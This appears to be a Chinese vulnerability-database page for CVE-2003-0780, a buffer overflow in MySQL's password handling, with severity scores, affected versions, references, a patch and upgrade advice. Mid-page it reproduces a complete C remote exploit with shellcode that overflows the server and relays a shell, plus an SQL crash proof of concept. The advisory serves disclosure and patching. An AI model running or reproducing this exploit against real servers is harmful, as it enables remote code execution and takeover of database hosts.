CVE-2003-0780
CVSS9.0
发布时间 :2003-09-22 00:00:00
修订时间 :2016-10-17 22:37:23
NMCOES    

[原文]Buffer overflow in get_salt_from_password from sql_acl.cc for MySQL 4.0.14 and earlier, and 3.23.x, allows attackers with ALTER TABLE privileges to execute arbitrary code via a long Password field.


[CNNVD]MySQL超长Password字段缓冲区溢出漏洞(CNNVD-200309-035)

        
        MySQL是一款开放源代码关系型数据库系统。
        MySQL中一个涉及到密码检查的函数缺少正确的边界缓冲区检查,本地或者远程攻击者可以利用这个漏洞对MySQL进行缓冲区溢出攻击,可造成拒绝服务或者以MySQL进程权限在系统上执行任意指令。
        MySQL用户的Passwords存储在"mysql"数据库中的"User"表中,这些密码存储在密码字段通过HASH后以16个字符长度十六进度形式存储。但是设计到密码检查的函数没有进行正确边界检查,如果使用的"Password"字段超过16个字符,可发生缓冲区溢出。
        sql/password.c中定义的get_salt_from_password()函数接受任意长的HEX密码并返回任意长数组值,在传递这些密码HASH值到sql/sql_acl.cc进行处理时没有进行正确缓冲区检查,可在acl_init()函数中触发缓冲区溢出。
        

- CVSS (基础分值)

CVSS分值: 9 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: SINGLE_INSTANCE [--]

- CPE (受影响的平台与产品)

cpe:/a:mysql:mysql:3.23.48MySQL MySQL 3.23.48
cpe:/a:mysql:mysql:3.23.49MySQL MySQL 3.23.49
cpe:/a:mysql:mysql:3.23.46MySQL MySQL 3.23.46
cpe:/a:mysql:mysql:3.23.47MySQL MySQL 3.23.47
cpe:/a:mysql:mysql:4.1.0:alphaMySQL MySQL 4.1.0 alpha
cpe:/a:mysql:mysql:3.23.30MySQL MySQL 3.23.30
cpe:/a:mysql:mysql:3.23.54aMySQL MySQL 3.23.54a
cpe:/a:mysql:mysql:3.23.44MySQL MySQL 3.23.44
cpe:/a:mysql:mysql:3.23.45MySQL MySQL 3.23.45
cpe:/a:mysql:mysql:3.23.42MySQL MySQL 3.23.42
cpe:/a:mysql:mysql:4.0.7:gammaMySQL MySQL 4.0.7 gamma
cpe:/a:mysql:mysql:3.23.43MySQL MySQL 3.23.43
cpe:/a:mysql:mysql:3.23MySQL MySQL 3.23
cpe:/a:mysql:mysql:4.0.1MySQL MySQL 4.0.1
cpe:/a:mysql:mysql:4.0.0MySQL MySQL 4.0.0
cpe:/a:mysql:mysql:3.23.9MySQL MySQL 3.23.9
cpe:/a:mysql:mysql:4.0.3MySQL MySQL 4.0.3
cpe:/a:mysql:mysql:3.23.8MySQL MySQL 3.23.8
cpe:/a:mysql:mysql:4.0.2MySQL MySQL 4.0.2
cpe:/a:mysql:mysql:3.23.40MySQL MySQL 3.23.40
cpe:/a:mysql:mysql:4.0.12MySQL MySQL 4.0.12
cpe:/o:conectiva:linux:9.0Conectiva Linux 9.0
cpe:/a:mysql:mysql:3.23.41MySQL MySQL 3.23.41
cpe:/a:mysql:mysql:4.0.11MySQL MySQL 4.0.11
cpe:/a:mysql:mysql:4.0.14MySQL MySQL 4.0.14
cpe:/a:mysql:mysql:4.0.13MySQL MySQL 4.0.13
cpe:/a:mysql:mysql:3.23.3MySQL MySQL 3.23.3
cpe:/a:mysql:mysql:3.23.55MySQL MySQL 3.23.55
cpe:/a:mysql:mysql:3.23.2MySQL MySQL 3.23.2
cpe:/a:mysql:mysql:3.23.56MySQL MySQL 3.23.56
cpe:/a:mysql:mysql:3.23.5MySQL MySQL 3.23.5
cpe:/a:mysql:mysql:3.23.53MySQL MySQL 3.23.53
cpe:/a:mysql:mysql:4.0.10MySQL MySQL 4.0.10
cpe:/o:conectiva:linux:7.0Conectiva Conectiva Linux 7.0
cpe:/a:mysql:mysql:3.23.10MySQL MySQL 3.23.10
cpe:/a:mysql:mysql:3.23.4MySQL MySQL 3.23.4
cpe:/a:mysql:mysql:3.23.54MySQL MySQL 3.23.54
cpe:/a:mysql:mysql:4.0.9:gammaMySQL MySQL 4.0.9 gamma
cpe:/a:mysql:mysql:4.0.8:gammaMySQL MySQL 4.0.8 gamma
cpe:/a:mysql:mysql:3.23.26MySQL MySQL 3.23.26
cpe:/a:mysql:mysql:3.23.27MySQL MySQL 3.23.27
cpe:/a:mysql:mysql:3.23.24MySQL MySQL 3.23.24
cpe:/a:mysql:mysql:3.23.25MySQL MySQL 3.23.25
cpe:/a:mysql:mysql:3.23.28MySQL MySQL 3.23.28
cpe:/a:mysql:mysql:3.23.29MySQL MySQL 3.23.29
cpe:/a:mysql:mysql:3.23.51MySQL MySQL 3.23.51
cpe:/a:mysql:mysql:3.23.52MySQL MySQL 3.23.52
cpe:/a:mysql:mysql:3.23.50MySQL MySQL 3.23.50
cpe:/a:mysql:mysql:3.23.22MySQL MySQL 3.23.22
cpe:/a:mysql:mysql:3.23.23MySQL MySQL 3.23.23
cpe:/a:mysql:mysql:3.23.28:gammaMySQL MySQL 3.23.28 gamma
cpe:/a:mysql:mysql:4.0.5MySQL MySQL 4.0.5
cpe:/a:mysql:mysql:4.0.4MySQL MySQL 4.0.4
cpe:/a:mysql:mysql:4.0.5aMySQL MySQL 4.0.5a
cpe:/a:mysql:mysql:4.0.7MySQL MySQL 4.0.7
cpe:/a:mysql:mysql:4.0.6MySQL MySQL 4.0.6
cpe:/a:mysql:mysql:3.23.37MySQL MySQL 3.23.37
cpe:/a:mysql:mysql:3.23.38MySQL MySQL 3.23.38
cpe:/a:mysql:mysql:3.23.36MySQL MySQL 3.23.36
cpe:/a:mysql:mysql:3.23.39MySQL MySQL 3.23.39
cpe:/o:conectiva:linux:8.0Conectiva Conectiva Linux 8.0
cpe:/a:mysql:mysql:3.23.53aMySQL MySQL 3.23.53a
cpe:/a:mysql:mysql:3.23.33MySQL MySQL 3.23.33
cpe:/a:mysql:mysql:3.23.34MySQL MySQL 3.23.34
cpe:/a:mysql:mysql:3.23.31MySQL MySQL 3.23.31
cpe:/a:mysql:mysql:3.23.32MySQL MySQL 3.23.32
cpe:/a:mysql:mysql:4.0.11:gammaMySQL MySQL 4.0.11 gamma
cpe:/a:mysql:mysql:4.0.9MySQL MySQL 4.0.9
cpe:/a:mysql:mysql:4.0.8MySQL MySQL 4.0.8
cpe:/a:mysql:mysql:4.1.0.0MySQL MySQL 4.1.0.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0780
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0780
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200309-035
(官方数据源) CNNVD

- 其它链接及资源

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000743
(UNKNOWN)  CONECTIVA  CLA-2003:743
http://lists.grok.org.uk/pipermail/full-disclosure/2003-September/009819.html
(UNKNOWN)  FULLDISC  20030910 Buffer overflow in MySQL
http://marc.info/?l=bugtraq&m=106364207129993&w=2
(UNKNOWN)  BUGTRAQ  20030913 exploit for mysql -- [get_salt_from_password] problem
http://marc.info/?l=bugtraq&m=106381424420775&w=2
(UNKNOWN)  TRUSTIX  2003-0034
http://www.debian.org/security/2003/dsa-381
(VENDOR_ADVISORY)  DEBIAN  DSA-381
http://www.kb.cert.org/vuls/id/516492
(UNKNOWN)  CERT-VN  VU#516492
http://www.mandriva.com/security/advisories?name=MDKSA-2003:094
(UNKNOWN)  MANDRAKE  MDKSA-2003:094
http://www.redhat.com/support/errata/RHSA-2003-281.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2003:281
http://www.redhat.com/support/errata/RHSA-2003-282.html
(UNKNOWN)  REDHAT  RHSA-2003:282
http://www.securityfocus.com/archive/1/337012
(VENDOR_ADVISORY)  BUGTRAQ  20030910 Buffer overflow in MySQL

- 漏洞信息

MySQL超长Password字段缓冲区溢出漏洞
高危 边界条件错误
2003-09-22 00:00:00 2007-05-30 00:00:00
远程  
        
        MySQL是一款开放源代码关系型数据库系统。
        MySQL中一个涉及到密码检查的函数缺少正确的边界缓冲区检查,本地或者远程攻击者可以利用这个漏洞对MySQL进行缓冲区溢出攻击,可造成拒绝服务或者以MySQL进程权限在系统上执行任意指令。
        MySQL用户的Passwords存储在"mysql"数据库中的"User"表中,这些密码存储在密码字段通过HASH后以16个字符长度十六进度形式存储。但是设计到密码检查的函数没有进行正确边界检查,如果使用的"Password"字段超过16个字符,可发生缓冲区溢出。
        sql/password.c中定义的get_salt_from_password()函数接受任意长的HEX密码并返回任意长数组值,在传递这些密码HASH值到sql/sql_acl.cc进行处理时没有进行正确缓冲区检查,可在acl_init()函数中触发缓冲区溢出。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * MySQL 4.0.14第三方补丁如下:
        --- mysql-4.0.14-old/sql/sql_acl.cc 2003-07-18 16:57:25.000000000 +0200
        +++ mysql-4.0.14/sql/sql_acl.cc 2003-09-10 23:21:13.559759576 +0200
         -233,7 +233,7
         "Found old style password for user ''. Ignoring user. (You may want to restart mysqld using --old-protocol)",
         user.user ? user.user : ""); /* purecov: tested */
         }
        - else if (length % 8) // This holds true for passwords
        + else if (length % 8 || length > 16) // This holds true for passwords
         {
         sql_print_error(
         "Found invalid password for user: ''; Ignoring user",
        厂商补丁:
        MySQL AB
        --------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载升级到MySQL 4.0.15:
        
        http://www.mysql.com/downloads/mysql-4.0.html

- 漏洞信息 (98)

MySQL 3.23.x/4.0.x Remote Exploit (EDBID:98)
linux remote
2003-09-14 Verified
3306 bkbll
N/A [点击下载]
/* Mysql 3.23.x/4.0.x remote exploit
* proof of concept
* using jmp *eax
* bkbll (bkbll cnhonker.net,bkbll tom.com) 2003/09/12
* compile:gcc -o mysql mysql.c -L/usr/lib/mysql -lmysqlclient
* DO NOT DISTRUBITED IT
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/select.h>
#include <netdb.h>
#include <mysql/mysql.h>

#define PAD 19*4*2
#define JMPADDR 0x42125b2b
#define ROOTUSER "root"
#define PORT 3306
#define MYDB "mysql"
#define ALTCOLUMSQL "ALTER TABLE user CHANGE COLUMN Password Password LONGTEXT"
#define LISTUSERSQL "SELECT user FROM mysql.user WHERE user!='root' OR user='root LIMIT 1,1'"
#define FLUSHSQL "\x11\x00\x00\x00\x03\x66\x6C\x75\x73\x68\x20\x70\x72\x69\x76\x69\x6C\x65\x67\x65\x73"
#define BUF 1024

MYSQL *conn;
char NOP[]="90";
/*
char shellcode[]=
"31c031db31c9b002"
"cd8085c0751b4b31"
"d2b007cd8031c0b0"
"40cd8089c331c9b1"
"09b025cd80b001cd"
"80b017cd8031c050"
"405089e331c9b0a2"
"cd80b1e089c883e8"
"0af7d04089c731c0"
"404c89e250505257"
"518d4c240431dbb3"
"0ab066cd805983f8"
"017505803a497409"
"e2d231c04089c3cd"
"8089fbb103b03f49"
"cd8041e2f851686e"
"2f7368682f2f6269"
"89e351682d696c70"
"89e251525389e131"
"d231c0b00bcd8090";
*/
char shellcode[]=
"db31c03102b0c931"
"c08580cd314b1b74"
"cd07b0d2b0c03180"
"8980cd40b1c931c3"
"cd25b009cd01b080"
"cd17b08050c03180"
"e3895040a2b0c931"
"e0b180cde883c889"
"40d0f70ac031c789"
"e2894c4057525050"
"244c8d51b3db3104"
"cd66b00af8835980"
"800575010974493a"
"c031d2e2cdc38940"
"b1fb8980493fb003"
"e24180cd6e6851f8"
"6868732f69622f2f"
"6851e389706c692d"
"5251e28931e18953"
"b0c031d29080cd0b";

int type=1;
struct
{
 char *os;
 u_long ret;
} targets[] =
     {
          { "glibc-2.2.93-5", 0x42125b2b },
    },v;

void usage(char *);
void sqlerror(char *);
MYSQL *mysqlconn(char *server,int port,char *user,char *pass,char *dbname);

main(int argc,char **argv)
{
    MYSQL_RES *result;
    MYSQL_ROW row;
    char jmpaddress[8];
    char buffer[BUF],muser[20],buf2[800];
    my_ulonglong rslines;
    struct sockaddr_in clisocket;
    int i=0,j,clifd,count,a;
    char data1,c;
    fd_set fds;
    char *server=NULL,*rootpass=NULL;

    if(argc<3) usage(argv[0]);
    while((c = getopt(argc, argv, "d:t:p:"))!= EOF)
      {
            switch (c)
            {
              case 'd':
                  server=optarg;
                  break;
              case 't':
                  type = atoi(optarg);
                  if((type > sizeof(targets)/sizeof(v)) || (type < 1))
                       usage(argv[0]);
                  break;
             case 'p':
                  rootpass=optarg;
                   break;
             default:
                  usage(argv[0]);
                  return 1;
              }
          }
          if(server==NULL || rootpass==NULL)
              usage(argv[0]);
    memset(muser,0,20);
    memset(buf2,0,800);
    printf("@-------------------------------------------------@\n");
    printf("#  Mysql 3.23.x/4.0.x remote exploit(2003/09/12)  #\n");
    printf("@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @\n");
    printf("---------------------------------------------------\n");
    printf("[+] Connecting to mysql server %s:%d....",server,PORT);
    fflush(stdout);
    conn=mysqlconn(server,PORT,ROOTUSER,rootpass,MYDB);
    if(conn==NULL) exit(0);
    printf("ok\n");
    printf("[+] ALTER user column...");
    fflush(stdout);
    if(mysql_real_query(conn,ALTCOLUMSQL,strlen(ALTCOLUMSQL))!=0)
        sqlerror("ALTER user table failed");
    //select
    printf("ok\n");
    printf("[+] Select a valid user...");
    fflush(stdout);
    if(mysql_real_query(conn,LISTUSERSQL,strlen(LISTUSERSQL))!=0) 
        sqlerror("select user from table failed");
    printf("ok\n");
    result=mysql_store_result(conn);
    if(result==NULL)
        sqlerror("store result error");
    rslines=mysql_num_rows(result);
    if(rslines==0)
        sqlerror("store result error");
    row=mysql_fetch_row(result);
    snprintf(muser,19,"%s",row[0]);
    printf("[+] Found a user:%s\n",muser);
    memset(buffer,0,BUF);
    i=sprintf(buffer,"update user set password='");
    sprintf(jmpaddress,"%x",JMPADDR);
    jmpaddress[8]=0;
    for(j=0;j<PAD-4;j+=2)
    {
        memcpy(buf2+j,NOP,2);
    }
    memcpy(buf2+j,"06eb",4);
    memcpy(buf2+PAD,jmpaddress,8);
    memcpy(buf2+PAD+8,shellcode,strlen(shellcode));
    j=strlen(buf2);
    if(j%8)
    {
        j=j/8+1;
        count=j*8-strlen(buf2);
        memset(buf2+strlen(buf2),'A',count);
    }
    printf("[+] Password length:%d\n",strlen(buf2));
    memcpy(buffer+i,buf2,strlen(buf2));
    i+=strlen(buf2);
    i+=sprintf(buffer+i,"' where user='%s'",muser);
    mysql_free_result(result);
    printf("[+] Modified password...");
    fflush(stdout);    
    //get result
    //write(2,buffer,i);
    if(mysql_real_query(conn,buffer,i)!=0) 
        sqlerror("Modified password error");
    //here I'll find client socket fd
    printf("ok\n");
    printf("[+] Finding client socket......");
    j=sizeof(clisocket);
    for(clifd=3;clifd<256;clifd++)
    {
        if(getpeername(clifd,(struct sockaddr *)&clisocket,&j)==-1) continue;
        if(clisocket.sin_port==htons(PORT)) break;
    }
    if(clifd==256)
    {
        printf("FAILED\n[-] Cannot find client socket\n");
        mysql_close(conn);
        exit(0);
    }
    data1='I';
    printf("ok\n");
    printf("[+] socketfd:%d\n",clifd);
    //let server overflow
    printf("[+] Overflow server....");
    fflush(stdout);
    send(clifd,FLUSHSQL,sizeof(FLUSHSQL),0);
    //if(mysql_real_query(conn,FLUSHSQL,strlen(FLUSHSQL))!=0) 
    //    sqlerror("Flush error");
    printf("ok\n");
      printf("[+] sending OOB.......");
      fflush(stdout);
      if(send(clifd,&data1,1,MSG_OOB)<1)
      {
          perror("error");
          mysql_close(conn);
          exit(0);
      }
    printf("ok\r\n");
    printf("[+] Waiting a shell.....");
    fflush(stdout);
    j=0;
    memset(buffer,0,BUF);
      while(1)
    {
        FD_ZERO(&fds);
        FD_SET(0, &fds);
        FD_SET(clifd, &fds);
        
        if (select(clifd+1, &fds, NULL, NULL, NULL) < 0) 
        {
            if (errno == EINTR) continue;
            break;
        }
        if (FD_ISSET(0, &fds)) 
        {
            count = read(0, buffer, BUF);
            if (count <= 0) break;
            if (write(clifd, buffer, count) <= 0) break;
            memset(buffer,0,BUF);
        }
        if (FD_ISSET(clifd, &fds)) 
        {
            count = read(clifd, buffer, BUF);
            if (count <= 0) break;
            if(j==0) printf("Ok\n");
            j=1;
            if (write(1, buffer, count) <= 0) break;
            memset(buffer,0,BUF);
        }
        
    }    
}

void usage(char *s)
{
    int a;
    printf("@-------------------------------------------------@\n");
    printf("#  Mysql 3.23.x/4.0.x remote exploit(2003/09/12)  #\n");
    printf("@ by bkbll(bkbll_at_cnhonker.net,bkbll_at_tom.com @\n");
    printf("---------------------------------------------------\n");
    printf("Usage:%s -d <host> -p <root_pass> -t <type>\n",s);
    printf("      -d target host ip/name\n");
    printf("      -p 'root' user paasword\n");
    printf("      -t  type [default:%d]\n",type);
    printf("      ------------------------------\n");
    for(a = 0; a < sizeof(targets)/sizeof(v); a++)
        printf("         %d [0x%.8x]: %s\n", a+1, targets[a].ret, targets[a].os);   
    printf("\n");           
    exit(0);
}
MYSQL *mysqlconn(char *server,int port,char *user,char *pass,char *dbname)
{
    MYSQL *connect;
    connect=mysql_init(NULL);
    if(connect==NULL)
    {
        printf("FAILED\n[-] init mysql failed:%s\n",mysql_error(connect));
        return NULL;
    }
    if(mysql_real_connect(connect,server,user,pass,dbname,port,NULL,0)==NULL)
    {
           printf("FAILED\n[-] Error: %s\n",mysql_error(connect));
           return NULL;
       }
       return connect;

}
void sqlerror(char *s)
{
    fprintf(stderr,"FAILED\n[-] %s:%s\n",s,mysql_error(conn));
    mysql_close(conn);
    exit(0);
}

// milw0rm.com [2003-09-14]
		

- 漏洞信息 (23138)

MySQL 3.23.x/4.0.x Password Handler Buffer Overflow Vulnerability (EDBID:23138)
linux dos
2003-09-10 Verified
0 Frank DENIS
N/A [点击下载]
source: http://www.securityfocus.com/bid/8590/info

MySQL server has been reported prone to a buffer overflow vulnerability when handling user passwords of excessive size.

The issue presents itself, due to a lack of sufficient bounds checking performed when processing MySQL user passwords. A password greater that 16 characters may overrun the bounds of a reserved buffer in memory and corrupt adjacent memory. An attacker with global administrative privileges on an affected MySQL server may potentially exploit this condition to have arbitrary supplied instructions executed in the context of the MySQL server.

> USE mysql;
> ALTER TABLE User CHANGE COLUMN Password Password LONGTEXT;
> UPDATE User SET Password =
'123456781234567812345678123456781234567812345678123456781234567812345678
123456781234567812345678123456781234567812345678123456781234567812345678
123456781234567812345678123456781234567812345678123456781234567812345678
12345678123456781234567812345678...' WHERE User = 'abcd';
> FLUSH PRIVILEGES;

[Connection lost]

mysqld_safe/safe_mysqld log :
		

- 漏洞信息

2537
MySQL sql_acl.cc get_salt_from_password Function Password Handling Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

A remote buffer overflow exists in MySQL. MySQL fails to validate the length of the user-supplied password in the MySQL's user table. If an authenticated attacker with the "alter database" privilege alters any user's password to a value longer longer than 16 characters, a buffer overflow occurs. With a specially crafted request, an attacker can cause the execution of arbitrary code resulting in a loss of integrity.

- 时间线

2003-09-11 Unknow
2003-09-11 Unknow

- 解决方案

Upgrade to version 4.0.15 or higher, as it has been reported to fix this vulnerability. It is also possible to correct this flaw by implementing the following workaround(s): Do not grant untrusted users the "alter database" privilege (a privilege normally granted only to root by default). Do not allow untrusted users to connect to MySQL directly (usually on port 3306/tcp).

- 相关参考

- 漏洞作者

- 漏洞信息

MySQL Password Handler Buffer Overflow Vulnerability
Boundary Condition Error 8590
Yes No
2003-09-10 12:00:00 2009-07-11 11:56:00
Discovery of this vulnerability has been credited to Frank Denis <j@pureftpd.org>.

- 受影响的程序版本

SGI ProPack 2.3
SGI ProPack 2.2.1
RedHat Enterprise Linux WS 2.1
RedHat Enterprise Linux ES 2.1
RedHat Advanced Workstation for the Itanium Processor 2.1
Red Hat Enterprise Linux AS 2.1
MySQL AB MySQL 4.0.14
+ OpenPKG OpenPKG 1.3
+ OpenPKG OpenPKG Current
+ Trustix Secure Linux 2.0
MySQL AB MySQL 4.0.13
MySQL AB MySQL 4.0.12
MySQL AB MySQL 4.0.11 -gamma
MySQL AB MySQL 4.0.11
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
MySQL AB MySQL 4.0.10
MySQL AB MySQL 4.0.9 -gamma
MySQL AB MySQL 4.0.9
MySQL AB MySQL 4.0.8 -gamma
MySQL AB MySQL 4.0.8
MySQL AB MySQL 4.0.7 -gamma
MySQL AB MySQL 4.0.7
MySQL AB MySQL 4.0.6
MySQL AB MySQL 4.0.5 a
MySQL AB MySQL 4.0.5
MySQL AB MySQL 4.0.4
MySQL AB MySQL 4.0.3
MySQL AB MySQL 4.0.2
MySQL AB MySQL 4.0.1
MySQL AB MySQL 4.0 .0
MySQL AB MySQL 3.23.58
+ Conectiva Linux 9.0
+ Red Hat Enterprise Linux AS 2.1
+ Red Hat Fedora Core2
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux Advanced Work Station 2.1
+ Sun Linux 5.0.7
+ Sun Linux 5.0.6
+ Sun Linux 5.0.5
+ Sun Linux 5.0.3
+ Sun Linux 5.0
+ Turbolinux Appliance Server 1.0 Workgroup Edition
+ Turbolinux Appliance Server 1.0 Hosting Edition
+ Turbolinux Appliance Server Hosting Edition 1.0
+ Turbolinux Appliance Server Workgroup Edition 1.0
+ Turbolinux Home
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Workstation 8.0
MySQL AB MySQL 3.23.56
MySQL AB MySQL 3.23.55
+ OpenPKG OpenPKG Current
+ Trustix Secure Linux 1.5
MySQL AB MySQL 3.23.54 a
+ OpenPKG OpenPKG 1.2
+ OpenPKG OpenPKG Current
+ RedHat Linux 9.0 i386
MySQL AB MySQL 3.23.54
+ Sun Cobalt RaQ 550
+ Trustix Secure Linux 1.5
MySQL AB MySQL 3.23.53 a
MySQL AB MySQL 3.23.53
+ OpenPKG OpenPKG Current
+ Sun Cobalt Qube 3
MySQL AB MySQL 3.23.52
+ Conectiva Linux Enterprise Edition 1.0
+ Mandriva Linux Mandrake 9.0
+ OpenPKG OpenPKG 1.1
+ RedHat Linux 8.0 i386
+ RedHat Linux 8.0
+ S.u.S.E. Linux 8.1
+ Trustix Secure Linux 1.5
MySQL AB MySQL 3.23.51
MySQL AB MySQL 3.23.50
MySQL AB MySQL 3.23.49
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ RedHat Linux 7.3 i686
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
MySQL AB MySQL 3.23.48
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
MySQL AB MySQL 3.23.47
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
MySQL AB MySQL 3.23.46
+ Conectiva Linux 8.0
+ OpenPKG OpenPKG 1.0
MySQL AB MySQL 3.23.45
MySQL AB MySQL 3.23.44
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3
MySQL AB MySQL 3.23.43
MySQL AB MySQL 3.23.42
MySQL AB MySQL 3.23.41
+ Mandriva Linux Mandrake 8.1 ia64
+ Mandriva Linux Mandrake 8.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 alpha
+ RedHat Linux 7.2
MySQL AB MySQL 3.23.40
MySQL AB MySQL 3.23.39
+ HP SCM 3.0
MySQL AB MySQL 3.23.38
MySQL AB MySQL 3.23.37
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
MySQL AB MySQL 3.23.36
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ EnGarde Secure Linux 1.0.1
+ Mandriva Linux Mandrake 8.0 ppc
+ Mandriva Linux Mandrake 8.0
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i686
+ RedHat Linux 7.1 i586
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1
MySQL AB MySQL 3.23.34
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
- Debian Linux 2.2
- FreeBSD FreeBSD 4.2
- FreeBSD FreeBSD 3.5.1
- HP HP-UX 11.11
- HP HP-UX 11.0
- IBM AIX 4.3.3
- IBM AIX 4.3.2
- Mandriva Linux Mandrake 7.2
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- OpenBSD OpenBSD 2.8
- OpenBSD OpenBSD 2.7
- OpenBSD OpenBSD 2.6
- RedHat Linux 7.0 i386
- RedHat Linux 7.0 alpha
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- S.u.S.E. Linux 7.1
- S.u.S.E. Linux 7.0
- S.u.S.E. Linux 6.4
- Sun Solaris 8_x86
- Sun Solaris 8_sparc
- Sun Solaris 7.0_x86
- Sun Solaris 7.0
- Sun Solaris 2.6_x86
- Sun Solaris 2.6
MySQL AB MySQL 3.23.33
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
+ S.u.S.E. Linux 7.1 ppc
+ S.u.S.E. Linux 7.1 alpha
+ S.u.S.E. Linux 7.1
MySQL AB MySQL 3.23.32
+ Wirex Immunix OS 7+
MySQL AB MySQL 3.23.31
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 7.2
MySQL AB MySQL 3.23.30
MySQL AB MySQL 3.23.29
MySQL AB MySQL 3.23.28 gamma
MySQL AB MySQL 3.23.28
MySQL AB MySQL 3.23.27
MySQL AB MySQL 3.23.26
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.1
MySQL AB MySQL 3.23.25
MySQL AB MySQL 3.23.24
MySQL AB MySQL 3.23.23
MySQL AB MySQL 3.23.22
+ RedHat Linux 7.0 sparc
+ RedHat Linux 7.0 alpha
+ RedHat Linux 7.0
MySQL AB MySQL 3.23.10
MySQL AB MySQL 3.23.9
MySQL AB MySQL 3.23.8
MySQL AB MySQL 3.23.5
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ Trustix Secure Linux 1.5
MySQL AB MySQL 3.23.4
MySQL AB MySQL 3.23.3
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
MySQL AB MySQL 3.23.2
MySQL AB MySQL 3.23 .x
MySQL AB MySQL 4.1.0.0-alpha
MySQL AB MySQL 4.1.0-0
Conectiva Linux 9.0
Conectiva Linux 8.0
Conectiva Linux 7.0
MySQL AB MySQL 4.0.15
+ Conectiva Linux 10.0
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ OpenPKG OpenPKG Current

- 不受影响的程序版本

MySQL AB MySQL 4.0.15
+ Conectiva Linux 10.0
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ OpenPKG OpenPKG Current

- 漏洞讨论

MySQL server has been reported prone to a buffer overflow vulnerability when handling user passwords of excessive size.

The issue presents itself, due to a lack of sufficient bounds checking performed when processing MySQL user passwords. A password greater that 16 characters may overrun the bounds of a reserved buffer in memory and corrupt adjacent memory. An attacker with global administrative privileges on an affected MySQL server may potentially exploit this condition to have arbitrary supplied instructions executed in the context of the MySQL server.

- 漏洞利用

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

The following proof of concept example has been supplied:

&gt; USE mysql;
&gt; ALTER TABLE User CHANGE COLUMN Password Password LONGTEXT;
&gt; UPDATE User SET Password =
'123456781234567812345678123456781234567812345678123456781234567812345678
123456781234567812345678123456781234567812345678123456781234567812345678
123456781234567812345678123456781234567812345678123456781234567812345678
12345678123456781234567812345678...' WHERE User = 'abcd';
&gt; FLUSH PRIVILEGES;

[Connection lost]

mysqld_safe/safe_mysqld log :

Additionally, lion has released an exploit for this problem.

- 解决方案

This issue has been reported to be addressed in MySQL 4.0.15.

Conectiva has released an advisory (CLA-2003:743), to address this issue. Users are advised to download and apply a relevant fixes as soon as possible. Further information relating to obtaining and applying appropriate fixes is available in the referenced advisory. Fixes are linked below. Conectiva has also released an advisory (CLSA-2003:764) for CLEE 1.0.

Trustix has released an advisory (TSLSA-2003-09-17) to address this issue. See referenced advisory for further details regarding the application of fixes. Fixes are linked below.

Debian has released advisory DSA 381-1 to address this issue. See referenced advisory for additional details.

Gentoo has released an advisory to address this issue. Gentoo updates can be applied with the following commands:

emerge sync
emerge \=dev-db/mysql/<mysql version>
emerge clean

OpenPKG has released an advisory to address this issue. Please see the attached advisory for detailed upgrade instructions.

EnGarde Secure Linux has released an advisory to address this issue. Please see the referenced advisory for detailed upgrade instructions.

Mandrake Linux has released an advisory to address this issue. Please see the referenced advisory for detailed upgrade instructions.
